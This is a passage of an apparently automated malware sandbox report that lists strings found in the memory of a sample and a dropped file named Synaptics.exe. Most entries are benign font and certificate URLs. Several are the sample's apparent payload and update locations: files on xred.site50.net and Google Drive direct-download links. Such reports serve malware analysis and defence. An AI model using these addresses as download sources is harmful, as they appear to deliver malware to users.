                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.545340507.00000000073B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.545340507.00000000073B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.400223198.0000000004962000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.400060032.0000000004962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.545340507.00000000073B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.545340507.00000000073B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.545340507.00000000073B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.545340507.00000000073B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.545340507.00000000073B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.389737544.0000000004962000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.389693511.0000000004962000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000002.545340507.00000000073B2000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.389584090.0000000004962000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.389775086.0000000004962000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.389540069.0000000004962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.545340507.00000000073B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.294342872.0000000003A2C000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.293818616.0000000003BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.294342872.0000000003A2C000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.293818616.0000000003BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.545340507.00000000073B2000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.382553108.0000000004940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.385932422.000000000493D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com==D
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.382553108.0000000004940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comk=6
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.385932422.000000000493D000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.386681749.000000000493D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comslnt
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.545340507.00000000073B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000002.545340507.00000000073B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.383835660.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.383808685.000000000493D000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000002.545340507.00000000073B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.383943638.0000000004944000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.383835660.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.383808685.000000000493D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn-u
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.384122490.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384096257.0000000004943000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.383943638.0000000004944000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.384176886.0000000004943000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn/
                              Source: Synaptics.exe.0.drString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
                              Source: Synaptics.exe, 00000002.00000002.499502598.00000000022B0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.376020252.00000000022B0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.405983396.00000000022B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
                              Source: A1FsbRkm5m.exe, 00000000.00000003.281143563.00000000024E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dlp
                              Source: Synaptics.exe.0.drString found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
                              Source: A1FsbRkm5m.exe, 00000000.00000003.281143563.00000000024E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.iniD0N
                              Source: Synaptics.exe, 00000002.00000002.499502598.00000000022B0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.376020252.00000000022B0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.405983396.00000000022B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
                              Source: Synaptics.exe.0.drString found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
                              Source: Synaptics.exe, 00000002.00000002.499502598.00000000022B0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.376020252.00000000022B0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.405983396.00000000022B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
                              Source: ._cache_A1FsbRkm5m.exeString found in binary or memory: https://bbs.360.cn/thread-15735708-1-1.html
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.drString found in binary or memory: https://bbs.360.cn/thread-15735708-1-1.htmlPA1http://www.360.cn/privacy/v3/360anquanweishi.htmlPA
                              Source: Synaptics.exe, 00000002.00000000.380696496.0000000007BF6000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519946349.000000001DD25000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.421623138.0000000007BF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.294342872.0000000003A2C000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.293818616.0000000003BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.293818616.0000000003BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                              Source: ._cache_A1FsbRkm5m.exe, 00000001.00000003.294342872.0000000003A2C000.00000004.00000800.00020000.00000000.sdmp, ._cache_A1FsbRkm5m.exe, 00000001.00000003.293818616.0000000003BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
                              Source: Synaptics.exe, 00000002.00000002.519451434.000000001DC70000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.438715068.000000001DC70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.goo
                              Source: Synaptics.exe, 00000002.00000000.407760127.000000000558D000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.422024132.0000000007DEE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.goog
                              Source: Synaptics.exe, 00000002.00000002.508771368.000000000F0EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.Nd
                              Source: Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404802165.0000000000806000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
                              Source: Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/&
                              Source: Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/-
                              Source: Synaptics.exe, 00000002.00000000.398863393.000000001DC02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/0
                              Source: Synaptics.exe, 00000002.00000000.398863393.000000001DC02000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519040121.000000001DC02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/Cm
                              Source: Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/GlEVGxuZVk&export=downloadz
                              Source: Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/I
                              Source: Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377610647.0000000005878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/a
                              Source: Synaptics.exe, 00000002.00000000.398863393.000000001DC02000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519040121.000000001DC02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/delle3m
                              Source: Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/my
                              Source: Synaptics.exe, 00000002.00000000.375758362.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499159034.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404802165.0000000000806000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/q2
                              Source: Synaptics.exe, 00000002.00000002.508771368.000000000F0EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?i
                              Source: A1FsbRkm5m.exe, 00000000.00000003.281143563.00000000024E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
                              Source: Synaptics.exe.0.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
                              Source: Synaptics.exe, 00000002.00000002.499502598.00000000022B0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.376020252.00000000022B0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.405983396.00000000022B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
                              Source: Synaptics.exe, 00000002.00000002.508771368.000000000F0EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSV
                              Source: Synaptics.exe, 00000002.00000000.380432666.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.420417448.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.502983467.0000000007B51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsO
                              Source: Synaptics.exe, 00000002.00000002.503838407.00000000082EE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.435208450.000000001907E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.434410432.0000000017DBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.504006571.00000000086AE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.402681300.00000000226BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.403731291.0000000023FBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.424437008.000000000A5AE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.521674186.00000000218FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.516874953.000000001A6FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.401393577.000000002077E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.522188315.00000000227FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.505683543.000000000B4AE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.406916668.000000000462E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.505843669.000000000B86E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.521767988.0000000021B7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.424822513.000000000ABEE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.501999481.000000000690E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.396747220.000000001A97E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.516380121.00000000197FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.401461539.00000000208BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.425911525.000000000BD6E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&expo
                              Source: A1FsbRkm5m.exe, 00000000.00000003.281143563.00000000024E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
                              Source: Synaptics.exe.0.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                              Source: Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.385676487.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428474579.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508283526.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#
                              Source: Synaptics.exe, 00000002.00000002.499207022.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#P
                              Source: Synaptics.exe, 00000002.00000002.501301876.0000000005907000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.409244131.0000000005907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#g
                              Source: Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.500972620.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.385676487.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428474579.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.421827465.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508283526.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.408309357.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503455143.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380825428.0000000007C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
                              Source: Synaptics.exe, 00000002.00000002.501301876.0000000005907000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.409244131.0000000005907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$f
                              Source: Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380432666.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.420417448.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.502983467.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%
                              Source: Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499334298.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%(
                              Source: Synaptics.exe, 00000002.00000000.421827465.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503455143.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380825428.0000000007C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%Cw
                              Source: Synaptics.exe, 00000002.00000000.375758362.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499159034.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499334298.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404802165.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&
                              Source: Synaptics.exe, 00000002.00000002.501301876.0000000005907000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.409244131.0000000005907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&e
                              Source: Synaptics.exe, 00000002.00000000.375758362.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.500972620.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499159034.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380432666.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.421827465.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.420417448.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.408309357.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.502983467.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404802165.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503455143.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380825428.0000000007C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(
                              Source: Synaptics.exe, 00000002.00000000.375758362.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499159034.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404802165.0000000000806000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(a
                              Source: Synaptics.exe, 00000002.00000000.375758362.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380635776.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.421289465.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503286393.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.500972620.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.385676487.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428474579.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499159034.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380432666.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.421827465.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508283526.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.420417448.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.408309357.0000000005894000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)
                              Source: Synaptics.exe, 00000002.00000000.386889262.000000000F0EC000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428758581.000000000F0EC000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.385676487.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428474579.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380432666.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508283526.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.420417448.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, 